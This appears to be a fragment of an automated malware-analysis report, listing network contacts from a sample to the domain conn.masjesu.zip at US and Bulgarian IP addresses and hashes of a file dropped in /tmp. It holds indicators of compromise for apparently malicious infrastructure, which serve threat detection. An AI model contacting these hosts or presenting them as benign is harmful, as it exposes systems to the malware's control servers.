US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp

Files

/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97